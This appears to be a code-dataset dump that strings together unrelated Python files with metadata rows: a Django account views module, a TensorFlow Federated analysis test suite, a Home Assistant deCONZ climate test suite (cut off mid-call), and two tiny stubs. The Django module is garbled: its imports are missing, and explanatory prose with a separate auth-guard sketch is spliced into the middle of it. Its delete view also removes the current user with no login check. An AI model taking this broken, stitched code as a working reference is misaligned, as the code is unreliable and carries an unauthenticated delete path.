from django.utils import timezone
import logging
import os
import json
import datetime
import calendar
from datetime import datetime, date
logging.basicConfig(level=os.environ.get("LOGLEVEL", "DEBUG"))
logger = logging.getLogger(__name__)
class LoginView(View):
    """This is how the login page is handled when attempting GET and POST
    requests.
    """
    template_name = "account/login.html"

    # If a user is logged in, they have no need to access the login page, so
    # we redirect them to their dashboard page. Otherwise, if they aren't
    # logged in, access to the login page allows them to do so.
    def get(self, request):
        if request.user.is_authenticated:
            # validC = validPayingCustomer(request)
            # if not validC:
            #     return redirect(reverse('account:payment'))
            return redirect(reverse('account:dashboard'))
        login_form = LoginForm()
        return render(request, self.template_name, {'form': login_form})

    # When a user submits the fields on the login page, we want to ensure that
    # the login credentials are correct. If they are, we redirect them to
    # their dashboard page. If they aren't, we render the login page again,
    # this time with an error message.
    def post(self, request):
        login_form = LoginForm(request, data=request.POST)
        if login_form.is_valid():
            login(request, login_form.get_user())
            # validC = validPayingCustomer(request)
            # if not validC:
            #     return redirect(reverse('account:payment'))
            # else:
            return redirect(reverse('account:dashboard'))
        messages.error(request, "Your email or password is incorrect.")
        return render(request, self.template_name, {'form': login_form})
class RegisterStudentView(View):
    """This is how the student registration page is handled when attempting
    GET and POST requests.
    """
    template_name = "account/register.html"
    model = User

    # Logged-in users should not see the registration page, so we redirect
    # them to their dashboard. Otherwise we render the registration form.
    def get(self, request):
        student_form = StudentForm()
        if request.user.is_authenticated:
            # is_SuperUser = request.user.is_superuser
            # if is_SuperUser:
            return redirect(reverse('account:dashboard'))
        return render(request, self.template_name, {'form': student_form})

    # When a user submits the fields on the registration page, we want to
    # ensure that the registration credentials are correct. If they are, we
    # create the student account and redirect to the login page. If they
    # aren't, we render the registration page again with the errors.
    def post(self, request):
        student_form = StudentForm(request.POST)
        if student_form.is_valid():
            student_form.instance.username = student_form.instance.email
            student_form.instance.is_student = True
            # customer_form.instance.billing_start_date = self.getBillingStart()
            student_form.save()
            return redirect(reverse('account:login'))
        return render(request, self.template_name, {'form': student_form})

    # def getBillingStart(self):
    #     today = datetime.today()
    #     firstThis = today.replace(day=1)
    #     firstNext = firstThis + relativedelta(months=+1)
    #     return firstNext
# class RegisterFacultyView(View):
# """This how the register page is handled when attempting GET and POST requests
# """
# template_name = "account/register.html"
# # If a user is logged in, they should not have access to the registration page, so we redirect them to their dashboard
# # If a user is not logged in, they should not have access to the registration page, so we redirect them to the login page
# # If a user is a superuser, they are the ONLY people that should be able to access the registration page, so we render the page and form for them
# def get(self, request):
# faculty_form = FacultyForm()
# if request.user.is_authenticated:
# # is_SuperUser = request.user.is_superuser
# # if is_SuperUser:
# return redirect(reverse('account:dashboard'))
# return render(request, self.template_name, {'form': faculty_form})
# # When a user submits the fields on the login page, we want to ensure that the registration credentials are correct
# # If they are, we redirect them to their dashboard page
# # If they aren't, we render the registration page again, this time with an error message
# def post(self, request):
# faculty_form = FacultyForm(request.POST)
# if faculty_form.is_valid():
# faculty_form.instance.username = faculty_form.instance.email
# faculty_form.instance.is_faculty = True
# # customer_form.instance.billing_start_date = self.getBillingStart()
# faculty_form.save()
# return redirect(reverse('account:login'))
# return render(request, self.template_name, {'form': faculty_form})
class DashboardView(View):
    """This is how the dashboard page is handled when attempting GET requests.
    """
    template_name = "account/dashboard.html"

    # If a user is logged in, they should have access to their dashboard page,
    # so we render their dashboard. If a user is not logged in, we redirect
    # them to the login page.
    def get(self, request):
        if request.user.is_authenticated:
            # validC = validPayingCustomer(request)
            # if not validC:
            #     return redirect(reverse('account:payment'))
            # print(request.user.billing_start_date)
            return render(request, self.template_name)
        else:
            return redirect(reverse('account:login'))
class JobBoardView(View):
    """This is how the job board page is handled when attempting GET requests
    """
    template_name = "account/JobBoard.html"

    # The job board is currently rendered for every visitor; the login check
    # (render for authenticated users, redirect others to the login page) is commented out below
    def get(self, request):
        # if request.user.is_authenticated:
        #     # validC = validPayingCustomer(request)
        #     # if not validC:
        #     #     return redirect(reverse('account:payment'))
        #     # print(request.user.billing_start_date)
        #     return render(request, self.template_name)
        # else:
        #     return redirect(reverse('account:login'))
        return render(request, self.template_name)

class SettingsView(View):
    """This is how the settings page is handled when attempting GET requests
    """
    template_name = "account/settings.html"

    # If a user is logged in, they should have access to their settings page, so we render their account settings
    # If a user is not logged in, they should not have access to the settings page, so we redirect them to the login page
    def get(self, request):
        if request.user.is_authenticated:
            # validC = validPayingCustomer(request)
            # if not validC:
            #     return redirect(reverse('account:payment'))
            return render(request, self.template_name)
        return redirect(reverse('account:login'))

# class StudentUpdateView(View):
#     """This is how the update page is handled when attempting GET and POST requests
#     """
#     template_name = "account/update_account.html"

#     # If a user is logged in, they should be able to access the update account page, so we render the update page and its form
#     # Otherwise, if they aren't logged in, they should not have access to the update account page, so we redirect them to the login page
#     def get(self, request):
#         update_form = StudentUpdateForm()
#         if request.user.is_authenticated:
#             # validC = validPayingCustomer(request)
#             # if not validC:
#             #     return redirect(reverse('account:payment'))
#             return render(request, self.template_name, {'form': update_form})
#         return redirect(reverse('account:login'))

#     # When a user submits the fields on the update account page, we want to ensure that the update credentials are correct
#     # If they are, we save the changes and redirect them to their dashboard page
#     # If they aren't, we render the update account page again, this time with an error message
#     def post(self, request):
#         update_form = StudentUpdateForm(request.POST, instance=request.user)
#         if update_form.is_valid():
#             update_form.instance.username = update_form.instance.email
#             update_form.save()
#             return redirect(reverse('account:dashboard'))
#         return render(request, self.template_name, {'form': update_form})

# class FacultyUpdateView(View):
#     """This is how the update page is handled when attempting GET and POST requests
#     """
#     template_name = "account/update_account.html"

#     # If a user is logged in, they should be able to access the update account page, so we render the update page and its form
#     # Otherwise, if they aren't logged in, they should not have access to the update account page, so we redirect them to the login page
#     def get(self, request):
#         update_form = FacultyUpdateForm()
#         if request.user.is_authenticated:
#             # validC = validPayingCustomer(request)
#             # if not validC:
#             #     return redirect(reverse('account:payment'))
#             return render(request, self.template_name, {'form': update_form})
#         return redirect(reverse('account:login'))

#     # When a user submits the fields on the update account page, we want to ensure that the update credentials are correct
#     # If they are, we save the changes and redirect them to their dashboard page
#     # If they aren't, we render the update account page again, this time with an error message
#     def post(self, request):
#         update_form = FacultyUpdateForm(request.POST, instance=request.user)
#         if update_form.is_valid():
#             update_form.instance.username = update_form.instance.email
#             update_form.save()
#             return redirect(reverse('account:dashboard'))
#         return render(request, self.template_name, {'form': update_form})

class DeleteView(View):
    """This is how the delete page is handled when attempting GET and POST requests
    """
    template_name = "account/delete_account.html"

    # If a user is logged in, they should be able to access the delete account page, so we render the delete page
    # Otherwise, if they aren't logged in, they should not have access to the delete account page, so we redirect them to the login page
    def get(self, request):
        if request.user.is_authenticated:
            return render(request, self.template_name)
        return redirect(reverse('account:login'))

    # If a user submits the delete button, sending a delete POST request, the account should be deleted
    def post(self, request):
        u = request.user
        u.delete()
        return redirect(reverse('account:login'))

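The views above all repeat the same guard: render the page for an authenticated user, otherwise redirect to the login page. As a framework-free sketch of that pattern (the names `require_login` and `FakeRequest` are illustrative, not from this project; Django users would typically reach for `LoginRequiredMixin` instead):

```python
# Hypothetical, framework-free sketch of the auth guard the views repeat.
def require_login(view):
    """Wrap a view so unauthenticated requests are bounced to login."""
    def wrapped(request):
        if request.user_is_authenticated:
            return view(request)
        return "redirect:account:login"
    return wrapped


class FakeRequest:
    """Stand-in for an HTTP request carrying an auth flag."""
    def __init__(self, user_is_authenticated):
        self.user_is_authenticated = user_is_authenticated


@require_login
def dashboard(request):
    return "render:account/dashboard.html"


print(dashboard(FakeRequest(True)))   # render:account/dashboard.html
print(dashboard(FakeRequest(False)))  # redirect:account:login
```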
class IndexView(View):
    """This was the placeholder for index.html before replacing the dashboard I created
    """
    template_name = "account/index.html"

    def get(self, request):
        if request.user.is_authenticated:
            # validC = validPayingCustomer(request)
            # if not validC:
            #     return redirect(reverse('account:payment'))
            return render(request, self.template_name)
        return redirect(reverse('account:login'))
| 47.249057 | 151 | 0.678939 | 1,648 | 12,521 | 5.093447 | 0.103762 | 0.020014 | 0.060043 | 0.080057 | 0.794139 | 0.770789 | 0.760782 | 0.760782 | 0.749226 | 0.719919 | 0 | 0.000211 | 0.241434 | 12,521 | 264 | 152 | 47.42803 | 0.883554 | 0.671911 | 0 | 0.419753 | 0 | 0 | 0.087356 | 0.028608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.123457 | false | 0.012346 | 0.197531 | 0.012346 | 0.728395 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
0a1083518e6c3ea618ef3ee09ebb2dce5938c0c6 | 22 | py | Python | learning/opengl/3_testing.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 2 | 2019-06-23T07:17:30.000Z | 2019-07-06T15:15:42.000Z | learning/opengl/3_testing.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | null | null | null | learning/opengl/3_testing.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 1 | 2019-06-23T07:17:43.000Z | 2019-06-23T07:17:43.000Z | from graphics import * | 22 | 22 | 0.818182 | 3 | 22 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 22 | 1 | 22 | 22 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a21f9a488407981bd2ff302cf0a76e8c3ae2ea4 | 59 | py | Python | magda/module/interface.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 8 | 2021-02-25T14:00:25.000Z | 2022-03-10T00:32:43.000Z | magda/module/interface.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 22 | 2021-03-24T11:56:47.000Z | 2021-11-02T15:09:50.000Z | magda/module/interface.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 6 | 2021-04-06T07:26:47.000Z | 2021-12-07T18:55:52.000Z | from abc import ABC
class ModuleInterface(ABC):
    pass
| 9.833333 | 27 | 0.728814 | 8 | 59 | 5.375 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220339 | 59 | 5 | 28 | 11.8 | 0.934783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
0a22dd6fece159c6b35aeb72671d4cef9324dc52 | 9,607 | py | Python | tensorflow_federated/python/core/impl/compiler/building_block_analysis_test.py | j35tor/federated | d92bfa6b8e3c9ebbac51ff7a3a180c2baaa08730 | [
"Apache-2.0"
] | 1 | 2021-04-01T08:35:06.000Z | 2021-04-01T08:35:06.000Z | tensorflow_federated/python/core/impl/compiler/building_block_analysis_test.py | j35tor/federated | d92bfa6b8e3c9ebbac51ff7a3a180c2baaa08730 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/core/impl/compiler/building_block_analysis_test.py | j35tor/federated | d92bfa6b8e3c9ebbac51ff7a3a180c2baaa08730 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import absltest
import tensorflow as tf
from tensorflow_federated.proto.v0 import computation_pb2 as pb
from tensorflow_federated.python.common_libs import serialization_utils
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.impl.compiler import building_block_analysis
from tensorflow_federated.python.core.impl.compiler import building_blocks
from tensorflow_federated.python.core.impl.types import type_serialization
from tensorflow_federated.python.core.impl.utils import tensorflow_utils
class CountTensorFlowOpsTest(absltest.TestCase):

  def test_raises_on_none(self):
    with self.assertRaises(TypeError):
      building_block_analysis.count_tensorflow_ops_in(None)

  def test_raises_on_reference(self):
    ref = building_blocks.Reference('x', tf.int32)
    with self.assertRaises(ValueError):
      building_block_analysis.count_tensorflow_ops_in(ref)

  def test_counts_correct_number_of_ops_simple_case(self):
    with tf.Graph().as_default() as g:
      a = tf.constant(0)
      b = tf.constant(1)
      c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    tf_ops_in_graph = building_block_analysis.count_tensorflow_ops_in(
        building_block)
    self.assertEqual(tf_ops_in_graph, 3)

  def test_counts_correct_number_of_ops_with_function(self):

    @computations.tf_computation(
        computation_types.TensorType(tf.int32, shape=[]))
    def foo(x):

      @tf.function
      def bar(x):
        return x + 1

      return bar(bar(x))

    building_block = foo.to_building_block()
    tf_ops_in_graph = building_block_analysis.count_tensorflow_ops_in(
        building_block)
    self.assertEqual(tf_ops_in_graph, 6)

class CountTensorFlowVariablesTest(absltest.TestCase):

  def test_raises_on_none(self):
    with self.assertRaises(TypeError):
      building_block_analysis.count_tensorflow_variables_in(None)

  def test_counts_no_variables(self):
    with tf.Graph().as_default() as g:
      a = tf.constant(0)
      b = tf.constant(1)
      c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
        building_block)
    self.assertEqual(tf_vars_in_graph, 0)

  def test_avoids_misdirection_with_name(self):
    with tf.Graph().as_default() as g:
      a = tf.constant(0, name='variable1')
      b = tf.constant(1, name='variable2')
      c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
        building_block)
    self.assertEqual(tf_vars_in_graph, 0)

  def test_counts_two_variables_correctly(self):
    with tf.Graph().as_default() as g:
      a = tf.Variable(0, name='variable1')
      b = tf.Variable(1, name='variable2')
      c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
        building_block)
    self.assertEqual(tf_vars_in_graph, 2)

  def test_counts_correct_variables_with_function(self):

    @computations.tf_computation(tf.int32)
    def foo(x):
      y = tf.Variable(initial_value=0)

      @tf.function
      def bar(x):
        y.assign_add(1)
        return x + y, tf.shape(y)

      z = bar(x)
      return bar(z[0])

    building_block = foo.to_building_block()
    tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
        building_block)
    self.assertEqual(tf_vars_in_graph, 1)

class GetDevicePlacementInTest(absltest.TestCase):

  def test_raises_with_reference(self):
    ref = building_blocks.Reference('x', tf.int32)
    with self.assertRaisesRegex(ValueError, 'tensorflow'):
      building_block_analysis.get_device_placement_in(ref)

  def test_gets_none_placement(self):
    with tf.Graph().as_default() as g:
      a = tf.Variable(0, name='variable1')
      b = tf.Variable(1, name='variable2')
      c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    device_placements = building_block_analysis.get_device_placement_in(
        building_block)
    all_device_placements = list(device_placements.keys())
    self.assertLen(all_device_placements, 1)
    self.assertEqual(all_device_placements[0], '')
    self.assertGreater(device_placements[''], 0)

  def test_gets_all_explicit_placement(self):
    with tf.Graph().as_default() as g:
      with tf.device('/cpu:0'):
        a = tf.constant(0)
        b = tf.constant(1)
        c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    device_placements = building_block_analysis.get_device_placement_in(
        building_block)
    all_device_placements = list(device_placements.keys())
    self.assertLen(all_device_placements, 1)
    self.assertIn('CPU', all_device_placements[0])
    self.assertGreater(device_placements[all_device_placements[0]], 0)

  def test_gets_some_explicit_some_none_placement(self):
    with tf.Graph().as_default() as g:
      with tf.device('/cpu:0'):
        a = tf.constant(0)
        b = tf.constant(1)
      c = a + b

    _, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
    packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
    function_type = computation_types.FunctionType(None, tf.int32)
    proto = pb.Computation(
        type=type_serialization.serialize_type(function_type),
        tensorflow=pb.TensorFlow(
            graph_def=packed_graph_def, parameter=None, result=result_binding))
    building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
    device_placements = building_block_analysis.get_device_placement_in(
        building_block)
    all_device_placements = list(device_placements.keys())
    self.assertLen(all_device_placements, 2)
    if all_device_placements[0]:
      self.assertIn('CPU', all_device_placements[0])
      self.assertEqual('', all_device_placements[1])
    else:
      self.assertIn('CPU', all_device_placements[1])
      self.assertEqual('', all_device_placements[0])
    self.assertGreater(device_placements[all_device_placements[0]], 0)
    self.assertGreater(device_placements[all_device_placements[1]], 0)

if __name__ == '__main__':
  absltest.main()
| 38.428 | 82 | 0.747788 | 1,268 | 9,607 | 5.328864 | 0.138801 | 0.041439 | 0.04499 | 0.034631 | 0.810123 | 0.78008 | 0.766908 | 0.721622 | 0.706527 | 0.689063 | 0 | 0.010063 | 0.162173 | 9,607 | 249 | 83 | 38.582329 | 0.82942 | 0.05954 | 0 | 0.690217 | 0 | 0 | 0.010531 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.092391 | false | 0 | 0.054348 | 0.005435 | 0.184783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a37debade3c6ca8c228379d3718e1e7f03c5810 | 23,121 | py | Python | tests/components/deconz/test_climate.py | AdmiralStipe/core | e9334347eb8354795cdb17f1401a80ef3abfb269 | [
"Apache-2.0"
] | 4 | 2016-06-22T12:00:41.000Z | 2018-06-11T20:31:25.000Z | tests/components/deconz/test_climate.py | AdmiralStipe/core | e9334347eb8354795cdb17f1401a80ef3abfb269 | [
"Apache-2.0"
] | 57 | 2020-10-15T06:47:00.000Z | 2022-03-31T06:11:18.000Z | tests/components/deconz/test_climate.py | AdmiralStipe/core | e9334347eb8354795cdb17f1401a80ef3abfb269 | [
"Apache-2.0"
] | 6 | 2019-07-06T00:43:13.000Z | 2021-01-16T13:27:06.000Z | """deCONZ climate platform tests."""
from copy import deepcopy

import pytest

from homeassistant.components.climate import (
    DOMAIN as CLIMATE_DOMAIN,
    SERVICE_SET_FAN_MODE,
    SERVICE_SET_HVAC_MODE,
    SERVICE_SET_PRESET_MODE,
    SERVICE_SET_TEMPERATURE,
)
from homeassistant.components.climate.const import (
    ATTR_FAN_MODE,
    ATTR_HVAC_MODE,
    ATTR_PRESET_MODE,
    ATTR_TARGET_TEMP_HIGH,
    ATTR_TARGET_TEMP_LOW,
    FAN_AUTO,
    FAN_HIGH,
    FAN_LOW,
    FAN_MEDIUM,
    FAN_OFF,
    FAN_ON,
    HVAC_MODE_AUTO,
    HVAC_MODE_COOL,
    HVAC_MODE_HEAT,
    HVAC_MODE_OFF,
    PRESET_COMFORT,
)
from homeassistant.components.deconz.climate import (
    DECONZ_FAN_SMART,
    DECONZ_PRESET_MANUAL,
)
from homeassistant.components.deconz.const import CONF_ALLOW_CLIP_SENSOR
from homeassistant.components.deconz.gateway import get_gateway_from_config_entry
from homeassistant.const import (
    ATTR_ENTITY_ID,
    ATTR_TEMPERATURE,
    STATE_OFF,
    STATE_UNAVAILABLE,
)

from .test_gateway import (
    DECONZ_WEB_REQUEST,
    mock_deconz_put_request,
    setup_deconz_integration,
)

SENSORS = {
    "1": {
        "id": "Thermostat id",
        "name": "Thermostat",
        "type": "ZHAThermostat",
        "state": {"on": True, "temperature": 2260, "valve": 30},
        "config": {
            "battery": 100,
            "heatsetpoint": 2200,
            "mode": "auto",
            "offset": 10,
            "reachable": True,
        },
        "uniqueid": "00:00:00:00:00:00:00:00-00",
    },
    "2": {
        "id": "CLIP thermostat id",
        "name": "CLIP thermostat",
        "type": "CLIPThermostat",
        "state": {"on": True, "temperature": 2260, "valve": 30},
        "config": {"reachable": True},
        "uniqueid": "00:00:00:00:00:00:00:02-00",
    },
}

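The tests below drive state changes by pushing websocket-style "changed" events whose `"state"`/`"config"` fragments are merged into the stored sensor record. A minimal sketch of that merge, assuming a hypothetical `apply_event` helper (this is not deCONZ's or Home Assistant's actual implementation):

```python
import copy


def apply_event(sensor, event):
    """Merge the "state"/"config" fragments of a deCONZ-style changed
    event into a copy of the sensor record and return the copy."""
    updated = copy.deepcopy(sensor)
    for section in ("state", "config"):
        if section in event:
            updated[section].update(event[section])
    return updated


# Minimal sensor record, shaped like the SENSORS fixture entries.
sensor = {"state": {"on": True, "temperature": 2260}, "config": {"mode": "auto"}}
event = {"t": "event", "e": "changed", "r": "sensors", "id": "1", "config": {"mode": "off"}}

updated = apply_event(sensor, event)
print(updated["config"]["mode"])  # off
```

Only the sections present in the event are touched; the rest of the record (and the original dict) is left as-is.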
async def test_no_sensors(hass, aioclient_mock):
    """Test that no sensors in deconz results in no climate entities."""
    await setup_deconz_integration(hass, aioclient_mock)
    assert len(hass.states.async_all()) == 0

async def test_simple_climate_device(hass, aioclient_mock):
    """Test successful creation of climate entities.

    This is a simple water heater that only supports setting temperature and on and off.
    """
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = {
        "0": {
            "config": {
                "battery": 59,
                "displayflipped": None,
                "heatsetpoint": 2100,
                "locked": None,
                "mountingmode": None,
                "offset": 0,
                "on": True,
                "reachable": True,
            },
            "ep": 1,
            "etag": "6130553ac247174809bae47144ee23f8",
            "lastseen": "2020-11-29T19:31Z",
            "manufacturername": "Danfoss",
            "modelid": "eTRV0100",
            "name": "thermostat",
            "state": {
                "errorcode": None,
                "lastupdated": "2020-11-29T19:28:40.665",
                "mountingmodeactive": False,
                "on": True,
                "temperature": 2102,
                "valve": 24,
                "windowopen": "Closed",
            },
            "swversion": "01.02.0008 01.02",
            "type": "ZHAThermostat",
            "uniqueid": "14:b4:57:ff:fe:d5:4e:77-01-0201",
        }
    }
    config_entry = await setup_deconz_integration(
        hass, aioclient_mock, get_state_response=data
    )
    gateway = get_gateway_from_config_entry(hass, config_entry)

    assert len(hass.states.async_all()) == 2
    climate_thermostat = hass.states.get("climate.thermostat")
    assert climate_thermostat.state == HVAC_MODE_HEAT
    assert climate_thermostat.attributes["hvac_modes"] == [
        HVAC_MODE_HEAT,
        HVAC_MODE_OFF,
    ]
    assert climate_thermostat.attributes["current_temperature"] == 21.0
    assert climate_thermostat.attributes["temperature"] == 21.0
    assert hass.states.get("sensor.thermostat_battery_level").state == "59"

    # Event signals thermostat configured off
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "state": {"on": False},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.thermostat").state == STATE_OFF

    # Event signals thermostat state on
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "state": {"on": True},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.thermostat").state == HVAC_MODE_HEAT

    # Verify service calls
    mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")

    # Service turn on thermostat
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_HVAC_MODE,
        {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_HEAT},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[1][2] == {"on": True}

    # Service turn off thermostat
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_HVAC_MODE,
        {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_OFF},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[2][2] == {"on": False}

    # Service set HVAC mode to unsupported value
    with pytest.raises(ValueError):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_HVAC_MODE,
            {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_AUTO},
            blocking=True,
        )

async def test_climate_device_without_cooling_support(hass, aioclient_mock):
    """Test successful creation of sensor entities."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = deepcopy(SENSORS)
    config_entry = await setup_deconz_integration(
        hass, aioclient_mock, get_state_response=data
    )
    gateway = get_gateway_from_config_entry(hass, config_entry)

    assert len(hass.states.async_all()) == 2
    climate_thermostat = hass.states.get("climate.thermostat")
    assert climate_thermostat.state == HVAC_MODE_AUTO
    assert climate_thermostat.attributes["hvac_modes"] == [
        HVAC_MODE_AUTO,
        HVAC_MODE_HEAT,
        HVAC_MODE_OFF,
    ]
    assert climate_thermostat.attributes["current_temperature"] == 22.6
    assert climate_thermostat.attributes["temperature"] == 22.0
    assert hass.states.get("sensor.thermostat") is None
    assert hass.states.get("sensor.thermostat_battery_level").state == "100"
    assert hass.states.get("climate.presence_sensor") is None
    assert hass.states.get("climate.clip_thermostat") is None

    # Event signals thermostat configured off
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "1",
        "config": {"mode": "off"},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.thermostat").state == STATE_OFF

    # Event signals thermostat state on
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "1",
        "config": {"mode": "other"},
        "state": {"on": True},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.thermostat").state == HVAC_MODE_HEAT

    # Event signals thermostat state off
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "1",
        "state": {"on": False},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.thermostat").state == STATE_OFF

    # Verify service calls
    mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/1/config")

    # Service set HVAC mode to auto
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_HVAC_MODE,
        {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_AUTO},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[1][2] == {"mode": "auto"}

    # Service set HVAC mode to heat
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_HVAC_MODE,
